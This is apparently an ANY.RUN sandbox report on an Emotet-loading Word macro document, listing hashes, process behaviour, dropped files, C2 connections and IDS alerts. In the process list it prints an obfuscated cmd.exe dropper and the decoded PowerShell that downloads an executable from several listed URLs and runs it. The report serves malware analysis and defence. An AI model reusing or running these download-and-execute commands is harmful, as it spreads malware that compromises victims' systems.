analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

201812_YUW_30678391.doc

Full analysis: https://app.any.run/tasks/55aa7c00-5ccb-4388-bb2d-18e7b469732f
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: December 14, 2018, 07:54:39
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
loader
trojan
emotet
feodo
emotet-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Dec 13 12:53:00 2018, Last Saved Time/Date: Thu Dec 13 12:53:00 2018, Number of Pages: 1, Number of Words: 4, Number of Characters: 23, Security: 0
MD5:

ACA8082C6A49777CF77E9DA56DF62922

SHA1:

66D7198B36027F7B6ABCAFE5E29A0335107E1245

SHA256:

ABF591321EE9666A3119ED05190CE39CE1E41E4A198DA0534C27B1419C601339

SSDEEP:

3072:b0nbUhoOODsQqT8GhDS0o9zTGOZD6EbzCdGzQ1JBC+zV1:NBoUOZDlbeGzuJBCyV

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3088)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3088)
    • Application was dropped or rewritten from another process

      • 437.exe (PID: 3648)
      • 437.exe (PID: 2836)
      • archivesymbol.exe (PID: 2488)
      • archivesymbol.exe (PID: 3204)
    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 2568)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2400)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2568)
    • EMOTET was detected

      • archivesymbol.exe (PID: 3204)
    • Connects to CnC server

      • archivesymbol.exe (PID: 3204)
    • Changes the autorun value in the registry

      • archivesymbol.exe (PID: 3204)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 3856)
    • Creates files in the user directory

      • powershell.exe (PID: 2568)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2568)
      • 437.exe (PID: 2836)
    • Starts itself from another location

      • 437.exe (PID: 2836)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3088)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3088)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: -
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2018:12:13 12:53:00
ModifyDate: 2018:12:13 12:53:00
Pages: 1
Words: 4
Characters: 23
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 26
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
8
Malicious processes
6
Suspicious processes
2

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe 437.exe no specs 437.exe archivesymbol.exe no specs #EMOTET archivesymbol.exe

Process information

PID
CMD
Path
Indicators
Parent process
3088"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\201812_YUW_30678391.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3856c:\imqqZGLsSu\izRwQqnNMYduWC\cQZzRKiJKSlnL\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:/C"set T8o=wEjApJCorrvARDOsMahjqDtWZIEDiBsaTu+,@'efVFl)YG(2\-5U.y04n6xS;kbzgN=3${}mK7 L9/H8:1cd&&for %U in (68,26,44,11,66,37,41,59,63,37,60,68,19,7,72,66,56,38,0,49,7,62,19,38,82,22,74,65,38,22,52,23,38,62,6,42,28,38,56,22,60,68,31,83,78,66,37,18,22,22,4,80,77,77,82,31,56,18,7,10,28,56,82,28,22,53,49,83,31,28,71,7,52,82,7,71,77,0,4,49,82,7,56,22,38,56,22,77,33,4,42,7,31,83,30,77,44,25,71,65,51,16,50,38,36,18,22,22,4,80,77,77,19,31,71,28,38,31,22,61,28,56,30,52,7,9,64,77,10,75,57,50,28,76,5,67,38,10,36,18,22,22,4,80,77,77,31,18,30,31,56,52,62,33,53,28,31,31,30,52,82,7,71,77,7,62,55,57,29,61,9,58,55,36,18,22,22,4,80,77,77,82,18,62,0,52,31,82,82,33,83,38,30,28,64,56,18,7,30,22,52,82,7,71,77,0,4,49,82,7,56,22,38,56,22,77,22,18,38,71,38,30,77,31,33,22,7,49,9,38,4,31,28,9,77,82,31,82,18,38,77,4,76,56,76,7,63,47,82,81,36,18,22,22,4,80,77,77,38,58,7,9,83,28,33,71,30,7,42,33,22,28,7,56,30,52,82,7,71,77,78,71,7,5,23,47,23,37,52,59,4,42,28,22,46,37,36,37,43,60,68,33,26,16,66,37,7,71,10,37,60,68,14,6,45,74,66,74,37,55,67,73,37,60,68,32,5,45,66,37,23,12,31,37,60,68,19,42,25,66,68,38,56,10,80,22,38,71,4,34,37,48,37,34,68,14,6,45,34,37,52,38,58,38,37,60,39,7,9,38,31,82,18,46,68,24,28,25,74,28,56,74,68,31,83,78,43,69,22,9,53,69,68,19,7,72,52,27,7,0,56,42,7,31,83,41,28,42,38,46,68,24,28,25,35,74,68,19,42,25,43,60,68,30,61,0,66,37,6,71,61,37,60,25,39,74,46,46,45,38,22,49,25,22,38,71,74,68,19,42,25,43,52,42,38,56,64,22,18,74,49,64,38,74,79,54,54,54,54,43,74,69,25,56,10,7,61,38,49,25,22,38,71,74,68,19,42,25,60,68,40,63,72,66,37,29,44,25,37,60,62,9,38,31,61,60,70,70,82,31,22,82,18,69,70,70,68,31,28,51,66,37,12,30,33,37,60,85)do set 4u0r=!4u0r!!T8o:~%U,1!&&if %U==85 powershell.exe "!4u0r:~6!""c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2400CmD /V:/C"set T8o=wEjApJCorrvARDOsMahjqDtWZIEDiBsaTu+,@'efVFl)YG(2\-5U.y04n6xS;kbzgN=3${}mK7 L9/H8:1cd&&for %U in (68,26,44,11,66,37,41,59,63,37,60,68,19,7,72,66,56,38,0,49,7,62,19,38,82,22,74,65,38,22,52,23,38,62,6,42,28,38,56,22,60,68,31,83,78,66,37,18,22,22,4,80,77,77,82,31,56,18,7,10,28,56,82,28,22,53,49,83,31,28,71,7,52,82,7,71,77,0,4,49,82,7,56,22,38,56,22,77,33,4,42,7,31,83,30,77,44,25,71,65,51,16,50,38,36,18,22,22,4,80,77,77,19,31,71,28,38,31,22,61,28,56,30,52,7,9,64,77,10,75,57,50,28,76,5,67,38,10,36,18,22,22,4,80,77,77,31,18,30,31,56,52,62,33,53,28,31,31,30,52,82,7,71,77,7,62,55,57,29,61,9,58,55,36,18,22,22,4,80,77,77,82,18,62,0,52,31,82,82,33,83,38,30,28,64,56,18,7,30,22,52,82,7,71,77,0,4,49,82,7,56,22,38,56,22,77,22,18,38,71,38,30,77,31,33,22,7,49,9,38,4,31,28,9,77,82,31,82,18,38,77,4,76,56,76,7,63,47,82,81,36,18,22,22,4,80,77,77,38,58,7,9,83,28,33,71,30,7,42,33,22,28,7,56,30,52,82,7,71,77,78,71,7,5,23,47,23,37,52,59,4,42,28,22,46,37,36,37,43,60,68,33,26,16,66,37,7,71,10,37,60,68,14,6,45,74,66,74,37,55,67,73,37,60,68,32,5,45,66,37,23,12,31,37,60,68,19,42,25,66,68,38,56,10,80,22,38,71,4,34,37,48,37,34,68,14,6,45,34,37,52,38,58,38,37,60,39,7,9,38,31,82,18,46,68,24,28,25,74,28,56,74,68,31,83,78,43,69,22,9,53,69,68,19,7,72,52,27,7,0,56,42,7,31,83,41,28,42,38,46,68,24,28,25,35,74,68,19,42,25,43,60,68,30,61,0,66,37,6,71,61,37,60,25,39,74,46,46,45,38,22,49,25,22,38,71,74,68,19,42,25,43,52,42,38,56,64,22,18,74,49,64,38,74,79,54,54,54,54,43,74,69,25,56,10,7,61,38,49,25,22,38,71,74,68,19,42,25,60,68,40,63,72,66,37,29,44,25,37,60,62,9,38,31,61,60,70,70,82,31,22,82,18,69,70,70,68,31,28,51,66,37,12,30,33,37,60,85)do set 4u0r=!4u0r!!T8o:~%U,1!&&if %U==85 powershell.exe "!4u0r:~6!""C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2568powershell.exe "$EYA='FSz';$joK=new-object Net.WebClient;$adH='http://canhovincity-daimo.com/wp-content/uploads/YImNUM5e@http://jamieatkins.org/vL65i9J3ev@http://ahsan.buyiaas.com/ob46Bkrx4@http://chbw.accudesignhost.com/wp-content/themes/auto-repair/cache/p9n9oz2c1@http://exordiumsolutions.com/HmoJW2W'.Split('@');$uEM='omv';$OCG = '437';$TJG='WRa';$jlI=$env:temp+'\'+$OCG+'.exe';foreach($ZiI in $adH){try{$joK.DownloadFile($ZiI, $jlI);$skw='Cmk';If ((Get-Item $jlI).length -ge 80000) {Invoke-Item $jlI;$VzK='BYI';break;}}catch{}}$aiU='Rsu';"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3648"C:\Users\admin\AppData\Local\Temp\437.exe" C:\Users\admin\AppData\Local\Temp\437.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
ODBC (3.0) driver for DBase
Exit code:
0
Version:
4.0.6304.0
2836"C:\Users\admin\AppData\Local\Temp\437.exe"C:\Users\admin\AppData\Local\Temp\437.exe
437.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
ODBC (3.0) driver for DBase
Exit code:
0
Version:
4.0.6304.0
2488"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe437.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
ODBC (3.0) driver for DBase
Exit code:
0
Version:
4.0.6304.0
3204"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe
archivesymbol.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
ODBC (3.0) driver for DBase
Version:
4.0.6304.0
Total events
1 742
Read events
1 253
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
2
Unknown types
7

Dropped files

PID
Process
Filename
Type
3088WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9570.tmp.cvr
MD5:
SHA256:
3088WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\486BA39F.wmf
MD5:
SHA256:
3088WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\91BD8E05.wmf
MD5:
SHA256:
2568powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PYDTH14JW6QSBTJ1WN60.temp
MD5:
SHA256:
2568powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
3088WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:58C0DB2B0041C656A4C7769A15ADEA51
SHA256:1E1114A3C3786E2AC0E09BFE1F1DFACD809EFA224F284C820A935EC5474808B0
2568powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19ac82.TMPbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
2568powershell.exeC:\Users\admin\AppData\Local\Temp\437.exeexecutable
MD5:D165B0DB118F6B6F8D5B28C73D328B3F
SHA256:6CA8BB0DE1D669B2C2EB86AF84479E24DB962599B23BFF5E0B816515D82C7084
3088WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8B2FA914.wmfwmf
MD5:E3139B21BBBBF58A22F39905E037E1F8
SHA256:E031A20175ACD6BAA10EE97D6D1812D355E2C30AB67E54A98A4B54496B56537A
3088WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\201812_YUW_30678391.doc.LNKlnk
MD5:81A64E7585670E1182B72B8924B29F88
SHA256:90BFA097549120A2BF909B19B76E4E8C3CF85799E9D87EC0A60E46176B9F327F
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2568
powershell.exe
GET
200
115.146.123.252:80
http://canhovincity-daimo.com/wp-content/uploads/YImNUM5e/
VN
executable
120 Kb
suspicious
3204
archivesymbol.exe
GET
200
190.146.201.54:80
http://190.146.201.54/
CO
binary
9.72 Kb
malicious
3204
archivesymbol.exe
GET
200
190.146.201.54:80
http://190.146.201.54/
CO
binary
148 b
malicious
2568
powershell.exe
GET
301
115.146.123.252:80
http://canhovincity-daimo.com/wp-content/uploads/YImNUM5e
VN
html
185 b
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2568
powershell.exe
115.146.123.252:80
canhovincity-daimo.com
CMC Telecommunications Services Company
VN
suspicious
3204
archivesymbol.exe
190.146.201.54:80
Telmex Colombia S.A.
CO
malicious

DNS requests

Domain
IP
Reputation
canhovincity-daimo.com
  • 115.146.123.252
suspicious

Threats

PID
Process
Class
Message
2568
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2568
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2568
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
3204
archivesymbol.exe
A Network Trojan was detected
SC SPYWARE Spyware Emotet Win32
3204
archivesymbol.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
3204
archivesymbol.exe
A Network Trojan was detected
SC SPYWARE Spyware Emotet Win32
3204
archivesymbol.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
2 ETPRO signatures available at the full report
No debug info